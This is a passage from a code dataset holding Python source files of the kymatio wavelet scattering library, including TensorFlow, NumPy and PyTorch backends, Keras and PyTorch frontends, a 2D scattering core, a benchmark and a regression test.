Defaults to\n 0.\n Returns\n -------\n res : tensor\n The tensor passed along the third dimension.\n \"\"\"\n if (pad_left >= x.shape[-1]) or (pad_right >= x.shape[-1]):\n if mode == 'reflect':\n raise ValueError('Indefinite padding size (larger than tensor).')\n\n paddings = [[0, 0]] * len(x.shape[:-1])\n paddings += [[pad_left, pad_right],]\n return tf.cast(tf.pad(x, paddings, mode=\"REFLECT\"), tf.complex64)\n\n\ndef pad(x, pad_left=0, pad_right=0):\n \"\"\"Pad real 1D tensors and map to complex\n Padding which allows to simultaneously pad in a reflection fashion and map\n to complex if necessary.\n Parameters\n ----------\n x : tensor\n Three-dimensional input tensor with the third axis being the one to\n be padded.\n pad_left : int\n Amount to add on the left of the tensor (at the beginning of the\n temporal axis).\n pad_right : int\n amount to add on the right of the tensor (at the end of the temporal\n axis).\n Returns\n -------\n output : tensor\n A padded signal\n \"\"\"\n output = pad_1d(x, pad_left, pad_right, mode='reflect')\n return output\n\n\ndef unpad(x, i0, i1):\n \"\"\"Unpad real 1D tensor\n Slices the input tensor at indices between i0 and i1 along the last axis.\n Parameters\n ----------\n x : tensor\n Input tensor with least one axis.\n i0 : int\n Start of original signal before padding.\n i1 : int\n End of original signal before padding.\n Returns\n -------\n x_unpadded : tensor\n The tensor x[..., i0:i1].\n \"\"\"\n return x[..., i0:i1]\n\n\n\nbackend = namedtuple('backend', ['name', 'modulus_complex', 'subsample_fourier', 'real', 'unpad', 'fft', 'concatenate'])\nbackend.name = 'tensorflow'\nbackend.modulus_complex = Modulus()\nbackend.subsample_fourier = subsample_fourier\nbackend.real = real\nbackend.unpad = unpad\nbackend.cdgmm = cdgmm\nbackend.pad = pad\nbackend.pad_1d = pad_1d\nbackend.fft = FFT(lambda x: tf.signal.fft(x, name='fft1d'),\n lambda x: tf.signal.ifft(x, name='ifft1d'),\n lambda x: tf.math.real(tf.signal.ifft(x, name='irfft1d')),\n lambda x: None)\nbackend.concatenate = lambda x: concatenate(x, -2)\n"
},
{
"alpha_fraction": 0.5126323103904724,
"alphanum_fraction": 0.522704005241394,
"avg_line_length": 38.31543731689453,
"blob_id": "008a75a668071ba5e187710ab30c5b0955befb0a",
"content_id": "d2450272c009aeed70b9316795a3a059ae29ba5b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5858,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 149,
"path": "/kymatio/scattering1d/frontend/torch_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Mathieu Andreux, Joakim Anden, Edouard Oyallon\n# Scientific Ancestry: Joakim Anden, Mathieu Andreux, Vincent Lostanlen\n\nimport torch\nimport warnings\n\nfrom ...frontend.torch_frontend import ScatteringTorch\nfrom ..core.scattering1d import scattering1d\nfrom ..utils import precompute_size_scattering\nfrom .base_frontend import ScatteringBase1D\n\n\nclass ScatteringTorch1D(ScatteringTorch, ScatteringBase1D):\n def __init__(self, J, shape, Q=1, max_order=2, average=True,\n oversampling=0, vectorize=True, out_type='array', backend='torch'):\n ScatteringTorch.__init__(self)\n ScatteringBase1D.__init__(self, J, shape, Q, max_order, average,\n oversampling, vectorize, out_type, backend)\n ScatteringBase1D._instantiate_backend(self, 'kymatio.scattering1d.backend.')\n ScatteringBase1D.build(self)\n ScatteringBase1D.create_filters(self)\n self.register_filters()\n\n def register_filters(self):\n \"\"\" This function run the filterbank function that\n will create the filters as numpy array, and then, it\n saves those arrays as module's buffers.\"\"\"\n n = 0\n # prepare for pytorch\n for k in self.phi_f.keys():\n if type(k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n self.phi_f[k] = torch.from_numpy(\n self.phi_f[k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), self.phi_f[k])\n n += 1\n for psi_f in self.psi1_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n psi_f[sub_k] = torch.from_numpy(\n psi_f[sub_k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), psi_f[sub_k])\n n += 1\n for psi_f in self.psi2_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n psi_f[sub_k] = torch.from_numpy(\n psi_f[sub_k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), psi_f[sub_k])\n n += 1\n\n def load_filters(self):\n \"\"\"This function loads filters from the module's buffer \"\"\"\n buffer_dict = dict(self.named_buffers())\n n = 0\n\n for k in self.phi_f.keys():\n if type(k) != str:\n self.phi_f[k] = buffer_dict['tensor' + str(n)]\n n += 1\n\n for psi_f in self.psi1_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n psi_f[sub_k] = buffer_dict['tensor' + str(n)]\n n += 1\n\n for psi_f in self.psi2_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n psi_f[sub_k] = buffer_dict['tensor' + str(n)]\n n += 1\n\n def scattering(self, x):\n # basic checking, should be improved\n if len(x.shape) < 1:\n raise ValueError(\n 'Input tensor x should have at least one axis, got {}'.format(\n len(x.shape)))\n\n if not self.out_type in ('array', 'list'):\n raise RuntimeError(\"The out_type must be one of 'array' or 'list'.\")\n\n if not self.average and self.out_type == 'array' and self.vectorize:\n raise ValueError(\"Options average=False, out_type='array' and \"\n \"vectorize=True are mutually incompatible. \"\n \"Please set out_type to 'list' or vectorize to \"\n \"False.\")\n\n if not self.vectorize:\n warnings.warn(\"The vectorize option is deprecated and will be \"\n \"removed in version 0.3. 
Please set \"\n \"out_type='list' for equivalent functionality.\",\n DeprecationWarning)\n\n batch_shape = x.shape[:-1]\n signal_shape = x.shape[-1:]\n\n x = x.reshape((-1, 1) + signal_shape)\n\n self.load_filters()\n\n # get the arguments before calling the scattering\n # treat the arguments\n if self.vectorize:\n size_scattering = precompute_size_scattering(\n self.J, self.Q, max_order=self.max_order, detail=True)\n else:\n size_scattering = 0\n\n\n S = scattering1d(x, self.backend.pad, self.backend.unpad, self.backend, self.J, self.psi1_f, self.psi2_f, self.phi_f,\\\n max_order=self.max_order, average=self.average,\n pad_left=self.pad_left, pad_right=self.pad_right,\n ind_start=self.ind_start, ind_end=self.ind_end,\n oversampling=self.oversampling,\n vectorize=self.vectorize,\n size_scattering=size_scattering,\n out_type=self.out_type)\n\n if self.out_type == 'array' and self.vectorize:\n scattering_shape = S.shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n S = S.reshape(new_shape)\n elif self.out_type == 'array' and not self.vectorize:\n for k, v in S.items():\n # NOTE: Have to get the shape for each one since we may have\n # average == False.\n scattering_shape = v.shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n S[k] = v.reshape(new_shape)\n elif self.out_type == 'list':\n for x in S:\n scattering_shape = x['coef'].shape[-1:]\n new_shape = batch_shape + scattering_shape\n\n x['coef'] = x['coef'].reshape(new_shape)\n\n return S\n\n\nScatteringTorch1D._document()\n\n\n__all__ = ['ScatteringTorch1D']\n"
},
{
"alpha_fraction": 0.5499621629714966,
"alphanum_fraction": 0.565102219581604,
"avg_line_length": 29.720930099487305,
"blob_id": "9cf4605d7abbef18e769cc5c2aa9c88c9fd7ea09",
"content_id": "25b0017623d7c1f7ac29b016473e857de544fe85",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2642,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 86,
"path": "/kymatio/scattering2d/backend/tensorflow_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Sergey Zagoruyko, Muawiz Chaudhary\n\nimport tensorflow as tf\nfrom collections import namedtuple\n\nBACKEND_NAME = 'tensorflow'\n\n\nfrom ...backend.tensorflow_backend import Modulus, cdgmm, concatenate\nfrom ...backend.base_backend import FFT\n\nclass Pad(object):\n def __init__(self, pad_size, input_size):\n \"\"\"\n Padding which allows to simultaneously pad in a reflection fashion\n and map to complex.\n Parameters\n ----------\n pad_size : list of 4 integers\n size of padding to apply.\n input_size : list of 2 integers\n size of the original signal\n \"\"\"\n self.pad_size = pad_size\n\n def __call__(self, x):\n paddings = [[0, 0]] * len(x.shape[:-2])\n paddings += [[self.pad_size[0], self.pad_size[1]], [self.pad_size[2], self.pad_size[3]]]\n return tf.cast(tf.pad(x, paddings, mode=\"REFLECT\"), tf.complex64)\n\ndef unpad(in_):\n \"\"\"\n Slices the input tensor at indices between 1::-1\n Parameters\n ----------\n in_ : tensor_like\n input tensor\n Returns\n -------\n in_[..., 1:-1, 1:-1]\n \"\"\"\n return in_[..., 1:-1, 1:-1]\n\n\nclass SubsampleFourier(object):\n \"\"\" Subsampling of a 2D image performed in the Fourier domain.\n\n Subsampling in the spatial domain amounts to periodization\n in the Fourier domain, hence the formula.\n\n Parameters\n ----------\n x : tensor_like\n input tensor with at least three dimensions.\n k : int\n integer such that x is subsampled by k along the spatial variables.\n\n Returns\n -------\n out : tensor_like\n Tensor such that its Fourier transform is the Fourier\n transform of a subsampled version of x, i.e. in\n F^{-1}(out)[u1, u2] = F^{-1}(x)[u1 * k, u2 * k]\n\n \"\"\"\n def __call__(self, x, k):\n y = tf.reshape(x, (-1, k, x.shape[1] // k, k, x.shape[2] // k))\n\n out = tf.reduce_mean(y, axis=(1, 3))\n return out\n\n\n\nbackend = namedtuple('backend', ['name', 'cdgmm', 'modulus', 'subsample_fourier', 'fft', 'Pad', 'unpad', 'concatenate'])\n\nbackend.name = 'tensorflow'\nbackend.cdgmm = cdgmm\nbackend.modulus = Modulus()\nbackend.subsample_fourier = SubsampleFourier()\nbackend.fft = FFT(lambda x: tf.signal.fft2d(x, name='fft2d'),\n lambda x: tf.signal.ifft2d(x, name='ifft2d'),\n lambda x: tf.math.real(tf.signal.ifft2d(x, name='irfft2d')),\n lambda x: None)\nbackend.Pad = Pad\nbackend.unpad = unpad\nbackend.concatenate = lambda x: concatenate(x, -3)\n"
},
{
"alpha_fraction": 0.5425242781639099,
"alphanum_fraction": 0.55611652135849,
"avg_line_length": 25.275510787963867,
"blob_id": "656018c43421131e96e65c0ec8757e1f29cb3b1a",
"content_id": "de8ae717bc18eaaaec4d79a6efb4b9e6351f1c8e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2575,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 98,
"path": "/kymatio/scattering2d/backend/numpy_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Sergey Zagoruyko, Muawiz Chaudhary\n\nimport numpy as np\nfrom collections import namedtuple\n\nBACKEND_NAME = 'numpy'\n\n\nfrom ...backend.numpy_backend import modulus, cdgmm\nfrom ...backend.base_backend import FFT\n\n\nclass Pad(object):\n def __init__(self, pad_size, input_size):\n \"\"\"\n Padding which allows to simultaneously pad in a reflection fashion\n and map to complex.\n\n Parameters\n ----------\n pad_size : list of 4 integers\n size of padding to apply.\n input_size : list of 2 integers\n size of the original signal\n\n \"\"\"\n self.pad_size = pad_size\n\n def __call__(self, x):\n paddings = ((0, 0),) * (x.ndim - 2)\n paddings += ((self.pad_size[0], self.pad_size[1]), (self.pad_size[2], self.pad_size[3]))\n\n output = np.pad(x, paddings, mode='reflect')\n return output\n\n\ndef unpad(in_):\n \"\"\"\n Slices the input tensor at indices between 1::-1\n\n Parameters\n ----------\n in_ : tensor_like\n input tensor\n\n Returns\n -------\n in_[..., 1:-1, 1:-1]\n\n \"\"\"\n return in_[..., 1:-1, 1:-1]\n\n\nclass SubsampleFourier(object):\n \"\"\" Subsampling of a 2D image performed in the Fourier domain.\n\n Subsampling in the spatial domain amounts to periodization\n in the Fourier domain, hence the formula.\n\n Parameters\n ----------\n x : tensor_like\n input tensor with at least three dimensions.\n k : int\n integer such that x is subsampled by k along the spatial variables.\n\n Returns\n -------\n out : tensor_like\n Tensor such that its Fourier transform is the Fourier\n transform of a subsampled version of x, i.e. in\n F^{-1}(out)[u1, u2] = F^{-1}(x)[u1 * k, u2 * k]\n\n \"\"\"\n def __call__(self, x, k):\n y = x.reshape(-1, k, x.shape[1] // k, k, x.shape[2] // k)\n\n out = y.mean(axis=(1, 3))\n\n return out\n\n\ndef concatenate(arrays):\n return np.stack(arrays, axis=-3)\n\n\nbackend = namedtuple('backend', ['name', 'cdgmm', 'modulus', 'subsample_fourier', 'fft', 'Pad', 'unpad', 'concatenate'])\nbackend.name = 'numpy'\nbackend.cdgmm = cdgmm\nbackend.modulus = modulus\nbackend.subsample_fourier = SubsampleFourier()\nbackend.fft = FFT(lambda x:np.fft.fft2(x),\n lambda x:np.fft.ifft2(x),\n lambda x:np.real(np.fft.ifft2(x)),\n lambda x:None)\nbackend.Pad = Pad\nbackend.unpad = unpad\nbackend.concatenate = concatenate\n"
},
{
"alpha_fraction": 0.4234234094619751,
"alphanum_fraction": 0.4579579532146454,
"avg_line_length": 25.639999389648438,
"blob_id": "01ec773158ca1b4715828e018f6990880a8bc7e0",
"content_id": "93afc07c371042fba6b997eb8dce138c80b83bb2",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1334,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 50,
"path": "/benchmarks/benchmarks/scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport kymatio.scattering1d.backend as backend\nfrom kymatio import Scattering1D\n\nclass BenchmarkScattering1D:\n params = [\n [\n { # Typical of EEG. J=8, Q=1, N=1024\n # See Warrick et al. Physiological Measurement 2019\n \"J\": 8,\n \"Q\": 1,\n \"shape\": 1024,\n },\n { # Typical of speech.\n # See Andén and Mallat TASLP 2014\n \"J\": 8,\n \"Q\": 8,\n \"shape\": 4096,\n },\n { # Typical of music.\n # See Andén et al.\n \"J\": 16,\n \"Q\": 12,\n \"shape\": 131072,\n },\n ],\n [\n 32,\n ]\n ]\n param_names = [\"sc_params\", \"batch_size\"]\n\n def setup(self, sc_params, batch_size):\n n_channels = 1\n scattering = Scattering1D(**sc_params)\n scattering.cpu()\n x = torch.randn(\n batch_size,\n n_channels,\n sc_params[\"shape\"],\n dtype=torch.float32)\n x.cpu()\n self.scattering = scattering\n self.x = x\n\n def time_constructor(self, sc_params, batch_size):\n Scattering1D(**sc_params)\n\n def time_forward(self, sc_params, batch_size):\n (self.scattering).forward(self.x)\n"
},
{
"alpha_fraction": 0.6047516465187073,
"alphanum_fraction": 0.6144708395004272,
"avg_line_length": 25.457143783569336,
"blob_id": "d3b626a64c373582a352b244183b3c25cf538059",
"content_id": "bd4a096eac7945555c93e328686d0b02c42d7dfd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 926,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 35,
"path": "/tests/scattering1d/test_numpy_scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom kymatio import Scattering1D\nimport os\nimport numpy as np\nimport io\n\nbackends = []\n\nfrom kymatio.scattering1d.backend.numpy_backend import backend\nbackends.append(backend)\n\nclass TestScattering1DNumpy:\n @pytest.mark.parametrize('backend', backends)\n def test_Scattering1D(self, backend):\n \"\"\"\n Applies scattering on a stored signal to make sure its output agrees with\n a previously calculated version.\n \"\"\"\n test_data_dir = os.path.dirname(__file__)\n\n with open(os.path.join(test_data_dir, 'test_data_1d.npz'), 'rb') as f:\n buffer = io.BytesIO(f.read())\n data = np.load(buffer)\n\n x = data['x']\n J = data['J']\n Q = data['Q']\n Sx0 = data['Sx']\n\n T = x.shape[-1]\n\n scattering = Scattering1D(J, T, Q, backend=backend, frontend='numpy')\n\n Sx = scattering(x)\n assert np.allclose(Sx, Sx0)\n"
},
{
"alpha_fraction": 0.6044018268585205,
"alphanum_fraction": 0.6044018268585205,
"avg_line_length": 43.29999923706055,
"blob_id": "6a13c54aaab34648b683c8ca857fd50a6747f241",
"content_id": "867c22f78d6910897a32400b723ad212bb97ea69",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1772,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 40,
"path": "/kymatio/frontend/base_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import importlib\n\n\nclass ScatteringBase():\n def __init__(self):\n super(ScatteringBase, self).__init__()\n\n def build(self):\n \"\"\" Defines elementary routines.\n\n This function should always call and create the filters via\n self.create_filters() defined below. For instance, via:\n self.filters = self.create_filters() \"\"\"\n raise NotImplementedError\n\n def _instantiate_backend(self, import_string):\n \"\"\" This function should instantiate the backend to be used if not already\n specified\"\"\"\n\n # Either the user entered a string, in which case we load the corresponding backend.\n if isinstance(self.backend, str):\n if self.backend.startswith(self.frontend_name):\n try:\n self.backend = importlib.import_module(import_string + self.backend + \"_backend\", 'backend').backend\n except ImportError:\n raise ImportError('Backend ' + self.backend + ' not found!')\n else:\n raise ImportError('The backend ' + self.backend + ' can not be called from the frontend ' +\n self.frontend_name + '.')\n # Either the user passed a backend object, in which case we perform a compatibility check.\n else:\n if not self.backend.name.startswith(self.frontend_name):\n raise ImportError('The backend ' + self.backend.name + ' is not supported by the frontend ' +\n self.frontend_name + '.')\n\n def create_filters(self):\n \"\"\" This function should run a filterbank function that\n will create the filters as numpy array, and then, it should\n save those arrays. \"\"\"\n raise NotImplementedError\n"
},
{
"alpha_fraction": 0.40248963236808777,
"alphanum_fraction": 0.44605809450149536,
"avg_line_length": 26.078651428222656,
"blob_id": "4f3ce28c2347d2e80d674f9e906b700d5cbb7844",
"content_id": "62903626d6c294d6102b83ddd23800759ac1eeb9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2410,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 89,
"path": "/kymatio/scattering2d/core/scattering2d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Muawiz Chaudhary\n# Scientific Ancestry: Edouard Oyallon, Laurent Sifre, Joan Bruna\n\ndef scattering2d(x, pad, unpad, backend, J, L, phi, psi, max_order,\n out_type='array'):\n subsample_fourier = backend.subsample_fourier\n modulus = backend.modulus\n fft = backend.fft\n cdgmm = backend.cdgmm\n concatenate = backend.concatenate\n\n # Define lists for output.\n out_S_0, out_S_1, out_S_2 = [], [], []\n\n U_r = pad(x)\n\n U_0_c = fft(U_r, 'C2C')\n\n # First low pass filter\n U_1_c = cdgmm(U_0_c, phi[0])\n U_1_c = subsample_fourier(U_1_c, k=2 ** J)\n\n S_0 = fft(U_1_c, 'C2R', inverse=True)\n S_0 = unpad(S_0)\n\n out_S_0.append({'coef': S_0,\n 'j': (),\n 'theta': ()})\n\n for n1 in range(len(psi)):\n j1 = psi[n1]['j']\n theta1 = psi[n1]['theta']\n\n U_1_c = cdgmm(U_0_c, psi[n1][0])\n if j1 > 0:\n U_1_c = subsample_fourier(U_1_c, k=2 ** j1)\n U_1_c = fft(U_1_c, 'C2C', inverse=True)\n U_1_c = modulus(U_1_c)\n U_1_c = fft(U_1_c, 'C2C')\n\n # Second low pass filter\n S_1_c = cdgmm(U_1_c, phi[j1])\n S_1_c = subsample_fourier(S_1_c, k=2 ** (J - j1))\n\n S_1_r = fft(S_1_c, 'C2R', inverse=True)\n S_1_r = unpad(S_1_r)\n\n out_S_1.append({'coef': S_1_r,\n 'j': (j1,),\n 'theta': (theta1,)})\n\n if max_order < 2:\n continue\n for n2 in range(len(psi)):\n j2 = psi[n2]['j']\n theta2 = psi[n2]['theta']\n\n if j2 <= j1:\n continue\n\n U_2_c = cdgmm(U_1_c, psi[n2][j1])\n U_2_c = subsample_fourier(U_2_c, k=2 ** (j2 - j1))\n U_2_c = fft(U_2_c, 'C2C', inverse=True)\n U_2_c = modulus(U_2_c)\n U_2_c = fft(U_2_c, 'C2C')\n\n # Third low pass filter\n S_2_c = cdgmm(U_2_c, phi[j2])\n S_2_c = subsample_fourier(S_2_c, k=2 ** (J - j2))\n\n S_2_r = fft(S_2_c, 'C2R', inverse=True)\n S_2_r = unpad(S_2_r)\n\n out_S_2.append({'coef': S_2_r,\n 'j': (j1, j2),\n 'theta': (theta1, theta2)})\n\n out_S = []\n out_S.extend(out_S_0)\n out_S.extend(out_S_1)\n out_S.extend(out_S_2)\n\n if out_type == 'array':\n out_S = concatenate([x['coef'] for x in out_S])\n\n return out_S\n\n\n__all__ = ['scattering2d']\n"
},
{
"alpha_fraction": 0.6293706297874451,
"alphanum_fraction": 0.6419580578804016,
"avg_line_length": 41.05882263183594,
"blob_id": "a8d305a6d8f1449c51c0be316557791d15fff0a6",
"content_id": "3de81350ac1a52b06fcd9519bc8320b367ac9faf",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1430,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 34,
"path": "/kymatio/scattering1d/frontend/keras_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ...frontend.keras_frontend import ScatteringKeras\nfrom ...scattering1d.frontend.base_frontend import ScatteringBase1D\n\nfrom kymatio.tensorflow import Scattering1D as ScatteringTensorFlow1D\n\nfrom tensorflow.python.framework import tensor_shape\n\n\nclass ScatteringKeras1D(ScatteringKeras, ScatteringBase1D):\n def __init__(self, J, Q=1, max_order=2, oversampling=0):\n ScatteringKeras.__init__(self)\n ScatteringBase1D.__init__(self, J, None, Q, max_order, True,\n oversampling, True, 'array', None)\n\n def build(self, input_shape):\n shape = tuple(tensor_shape.TensorShape(input_shape).as_list()[-1:])\n self.S = ScatteringTensorFlow1D(J=self.J, shape=shape,\n Q=self.Q, max_order=self.max_order,\n oversampling=self.oversampling)\n ScatteringKeras.build(self, input_shape)\n\n def compute_output_shape(self, input_shape):\n input_shape = tensor_shape.TensorShape(input_shape).as_list()\n nc = self.S.output_size()\n k0 = max(self.J - self.oversampling, 0)\n ln = self.S.ind_end[k0] - self.S.ind_start[k0]\n output_shape = [input_shape[0], nc, ln]\n return tensor_shape.TensorShape(output_shape)\n\n def get_config(self):\n keys = [\"J\", \"Q\", \"max_order\", \"oversampling\"]\n return {key: getattr(self, key) for key in keys}\n\nScatteringKeras1D._document()\n"
},
{
"alpha_fraction": 0.7139175534248352,
"alphanum_fraction": 0.75,
"avg_line_length": 31.33333396911621,
"blob_id": "fcb117d8c2447b83f1e32530968937c0fca8efe9",
"content_id": "7d8e8d8ce24fbf7adb5d652446936e46a1f1a4d7",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 12,
"path": "/kymatio/keras.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.keras_frontend \\\n import ScatteringKeras1D as Scattering1D\nfrom .scattering2d.frontend.keras_frontend \\\n import ScatteringKeras2D as Scattering2D\n\nScattering1D.__module__ = 'kymatio.keras'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.keras'\nScattering2D.__name__ = 'Scattering2D'\n\n__all__ = ['Scattering1D', 'Scattering2D']\n"
},
{
"alpha_fraction": 0.5569466352462769,
"alphanum_fraction": 0.5672057271003723,
"avg_line_length": 29.268421173095703,
"blob_id": "e3a7dd299031d91740cd8942b230aec55cf6804c",
"content_id": "33738a96971e9569d4197163c423a376928ca018",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5751,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 190,
"path": "/kymatio/scattering3d/backend/numpy_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom collections import namedtuple\nfrom scipy.fftpack import fftn, ifftn\n\n\nBACKEND_NAME = 'numpy'\n\n\ndef _iscomplex(x):\n return x.dtype == np.complex64 or x.dtype == np.complex128\n\n\ndef complex_modulus(input_array):\n \"\"\"Computes complex modulus.\n\n Parameters\n ----------\n input_array : tensor\n Input tensor whose complex modulus is to be calculated.\n Returns\n -------\n modulus : tensor\n Tensor the same size as input_array. modulus[..., 0] holds the\n result of the complex modulus, modulus[..., 1] = 0.\n\n \"\"\"\n\n return np.abs(input_array)\n\n\ndef modulus_rotation(x, module=None):\n \"\"\"Used for computing rotation invariant scattering transform coefficents.\n\n Parameters\n ----------\n x : tensor\n Size (batchsize, M, N, O, 2).\n module : tensor\n Tensor that holds the overall sum. If none, initializes the tensor\n to zero (default).\n Returns\n -------\n output : torch tensor\n Tensor of the same size as input_array. It holds the output of\n the operation::\n $\\\\sqrt{\\\\sum_m (\\\\text{input}_\\\\text{array} \\\\star \\\\psi_{j,l,m})^2)}$\n which is covariant to 3D translations and rotations.\n \"\"\"\n if module is None:\n module = np.zeros_like(x)\n else:\n module = module ** 2\n module += np.abs(x) ** 2\n return np.sqrt(module)\n\n\ndef compute_integrals(input_array, integral_powers):\n \"\"\"Computes integrals.\n\n Computes integrals of the input_array to the given powers.\n Parameters\n ----------\n input_array : torch tensor\n Size (B, M, N, O), where B is batch_size, and M, N, O are spatial\n dims.\n integral_powers : list\n List of P positive floats containing the p values used to\n compute the integrals of the input_array to the power p (l_p\n norms).\n Returns\n -------\n integrals : torch tensor\n Tensor of size (B, P) containing the integrals of the input_array\n to the powers p (l_p norms).\n \"\"\"\n integrals = np.zeros((input_array.shape[0], len(integral_powers)),\n dtype=np.complex64)\n for i_q, q in enumerate(integral_powers):\n integrals[:, i_q] = (input_array ** q).reshape((input_array.shape[0], -1)).sum(axis=1)\n return integrals\n\n\ndef fft(x, direction='C2C', inverse=False):\n \"\"\"\n Interface with torch FFT routines for 2D signals.\n\n Example\n -------\n x = torch.randn(128, 32, 32, 2)\n x_fft = fft(x, inverse=True)\n\n Parameters\n ----------\n input : tensor\n complex input for the FFT\n direction : string\n 'C2R' for complex to real, 'C2C' for complex to complex\n inverse : bool\n True for computing the inverse FFT.\n NB : if direction is equal to 'C2R', then an error is raised.\n\n \"\"\"\n if direction == 'C2R':\n if not inverse:\n raise RuntimeError('C2R mode can only be done with an inverse FFT.')\n\n if direction == 'C2R':\n output = np.real(ifftn(x, axes=(-3, -2, -1)))\n elif direction == 'C2C':\n if inverse:\n output = ifftn(x, axes=(-3, -2, -1))\n else:\n output = fftn(x, axes=(-3, -2, -1))\n\n return output\n\n\ndef cdgmm3d(A, B, inplace=False):\n \"\"\"Complex pointwise multiplication.\n\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : torch tensor\n Complex torch tensor.\n B : torch tensor\n Complex of the same size as A.\n inplace : boolean, optional\n If set True, all the operations are performed inplace.\n\n Raises\n ------\n RuntimeError\n In the event that the tensors are not compatibile for multiplication\n (i.e. 
the final four dimensions of A do not match with the dimensions\n of B), or in the event that B is not complex, or in the event that the\n type of A and B are not the same.\n TypeError\n In the event that x is not complex i.e. does not have a final dimension\n of 2, or in the event that both tensors are not on the same device.\n\n Returns\n -------\n output : torch tensor\n Torch tensor of the same size as A containing the result of the\n elementwise complex multiplication of A with B.\n \"\"\"\n\n if A.shape[-3:] != B.shape[-3:]:\n raise RuntimeError('The tensors are not compatible for multiplication.')\n\n if not _iscomplex(A) or not _iscomplex(B):\n raise TypeError('The input, filter and output should be complex.')\n\n if B.ndim != 3:\n raise RuntimeError('The second tensor must be simply a complex array.')\n\n if type(A) is not type(B):\n raise RuntimeError('A and B should be same type.')\n\n\n if inplace:\n return np.multiply(A, B, out=A)\n else:\n return A * B\n\n\ndef concatenate(arrays, L):\n S = np.stack(arrays, axis=1)\n S = S.reshape((S.shape[0], S.shape[1] // (L + 1), (L + 1)) + S.shape[2:])\n return S\n\n\nbackend = namedtuple('backend',\n ['name',\n 'cdgmm3d',\n 'fft',\n 'modulus',\n 'modulus_rotation',\n 'compute_integrals',\n 'concatenate'])\n\nbackend.name = 'numpy'\nbackend.cdgmm3d = cdgmm3d\nbackend.fft = fft\nbackend.concatenate = concatenate\nbackend.modulus = complex_modulus\nbackend.modulus_rotation = modulus_rotation\nbackend.compute_integrals = compute_integrals\n"
},
{
"alpha_fraction": 0.5912519097328186,
"alphanum_fraction": 0.5912519097328186,
"avg_line_length": 20.387096405029297,
"blob_id": "bd3005c1cef22c61d8fd4b1d8aba327365a5e2d9",
"content_id": "f5f796fead947ae0bdfb534c9683ea952e65656f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 663,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 31,
"path": "/kymatio/frontend/numpy_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ..backend.numpy_backend import input_checks\n\nclass ScatteringNumPy:\n def __init__(self):\n self.frontend_name = 'numpy'\n\n def scattering(self, x):\n \"\"\" This function should compute the scattering transform.\"\"\"\n raise NotImplementedError\n\n def __call__(self, x):\n \"\"\"This method is an alias for `scattering`.\"\"\"\n\n input_checks(x)\n\n return self.scattering(x)\n\n _doc_array = 'np.ndarray'\n _doc_array_n = 'n'\n\n _doc_alias_name = '__call__'\n\n _doc_alias_call = ''\n\n _doc_frontend_paragraph = ''\n\n _doc_sample = 'np.random.randn({shape})'\n\n _doc_has_shape = True\n\n _doc_has_out_type = True\n"
},
{
